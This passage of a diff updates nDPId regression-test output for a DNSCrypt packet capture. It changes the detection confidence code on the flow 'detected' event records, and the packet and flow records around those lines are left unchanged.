02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbYgAL0RbKQKAAABLZm7YLOjEPcGBK77MPMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":237,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312132} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":237,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbYAub0RkXcKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAIcwbdAAL0RUGMKAAABLZm7YLPvEPcCCKvPMPYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAIcwbhAAL0RUGIKAAABLZm7YKh5EPcCCKvPMPQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbkgAL0RbKEKAAABLZm7YJ4DEPcGBMSXMPcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":40451,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":241,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312132} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":241,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbkAub0RkXQKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":946739312132,"pkt":"ZmZmZmZmRERERERECABFAADZ1M0AADURfjozDz5BCgAAAQG7gvEAxUKLxUSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"} @@ -497,26 +497,26 @@ 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":946739312183,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739312183,"pkt":"ZmZmZmZmRERERERECABFAADWP4JAADYRWt8tmbtgCgAAARD3ngMAwicyMPeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAJDQ0ZbvRpC3D0bgumZKuy3tvg+CeWgIXh45Ishvbc3SjW3OKRxUShg2C7mIARv2NR589zRzZQEE1IcPTnNuvwAPMT4OYzIpCP1X\/njGK43zV6uPrF4F7max8o8+EVSzPA8xPg5jMikIAAAAAV9TfFZfVM3W"} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAIcaDJAAL0RMhoKAAABQlUec9pYAbsCCCOeLCwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":55896,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312286,"flow_last_seen":946739312286,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":946739312286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312286,"pkt":"REREREREZmZmZmZmCABFAAXcaDMgAL0RTlkKAAABQlUec71AAbsGBPfPLCkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA